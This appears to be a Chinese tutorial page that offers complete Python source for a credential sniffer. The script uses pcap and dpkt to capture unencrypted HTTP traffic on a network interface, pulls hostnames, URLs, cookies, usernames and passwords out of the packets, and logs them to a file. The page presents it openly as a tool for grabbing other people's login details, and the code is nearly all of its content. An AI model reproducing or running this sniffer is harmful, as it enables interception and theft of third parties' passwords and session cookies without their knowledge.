密码程序python_Python获取web密码程序的脚本源代码

利用Python代码获取web密码程序的脚本源代码分享，达到能够抓取用户名、密码、cookie等信息的方法详解。需要用到 pcap、dpkt两个方法模块，请确认已经安装成功。

python做的web获取解密码程序代码如下：

# -*- coding: utf8 -*-

#!/usr/bin/env python

import pcap

import dpkt

dev='eth0'

filter='tcp dst port 80'

pc=pcap.pcap(dev) #注，参数可为网卡名，如eth0

pc.setfilter(filter) #设置监听过滤器

hostlist=['', '', '', '', '', '']

file=open('passwd.txt','w')

for ptime,pdata in pc:

#ptime为收到时间，pdata为收到数据

ether=dpkt.ethernet.Ethernet(pdata)

ip=ether.data

tcp=ip.data

content_len=len(tcp)-8

host=''

username=''

password=''

cookie=''

geturl=''

posturl=''

username_pattern=''

password_pattern=''

#Only Process POST Packet

#if tcp.data.find('POST')==-1 or tcp.data.find('GET')==-1:

#

#continue

#Get Host

host_start=tcp.data.find('Host: ')

if host_start != -1:

host_end=tcp.data.find('\r\n', host_start)

if host_end != -1:

host=tcp.data[host_start:host_end]

#print host

else:

continue

else:

continue

#Check host in hostlist

for _host in hostlist:

if host.find(_host)==-1:

continue

else:

print _host

#Get GET URL

geturl_start=tcp.data.find('GET ')

if geturl_start!=-1:

geturl_end=tcp.data.find('\r\n', geturl_start)

if geturl_end!=-1:

geturl=tcp.data[geturl_start:geturl_end]

#print geturl

#Pass picture

if geturl.find('gif')!=-1 or geturl.find('png')!=-1 or geturl.find('jpg')!=-1:

continue;

#Get POST URL

posturl_start=tcp.data.find('POST ')

if posturl_start!=-1:

posturl_end=tcp.data.find('\r\n', posturl_start)

if posturl_end!=-1:

posturl=tcp.data[posturl_start:posturl_end]

#print posturl

#Get Cookie

cookie_start=tcp.data.find('Cookie: ')

if cookie_start!=-1:

cookie_end=tcp.data.find('\r\n', cookie_start)

if cookie_end != -1:

cookie=tcp.data[cookie_start:cookie_end]

#print cookie

#Compute username_pattern

if host.find('')!=-1 or host.find('')!=-1:

username_pattern='email='

elif host.find('')!=-1:

username_pattern='userid='

elif host.find('')!=-1:

username_pattern='login_name='

else:

username_pattern='username='

#Find UserName

username_start=tcp.data.find(username_pattern)

if username_start!=-1:

username_end=tcp.data.find('&', username_start)

if username_end!=-1:

username=tcp.data[username_start:username_end]

#print username

else:

continue

#Find Password

password_start=tcp.data.find('password=')

if password_start!=-1:

password_end=tcp.data.find('&', password_start)

if password_end!=-1:

password=tcp.data[password_start:password_end]

#print password

else:

continue

#Log to file

if host and posturl and username and password:

file.write('-----------------------\n')

file.write(host+'\n')

file.write(posturl+'\n')

file.write(username+'\n')

file.write(password+'\n')

file.flush()

elif host and geturl and cookie:

file.write('-----------------------\n')

file.write(host+'\n')

file.write(geturl+'\n')

file.write(cookie+'\n')

file.flush()

玩蛇网文章，转载请注明出处和文章网址：/code/c2652.html

相关文章 Recommend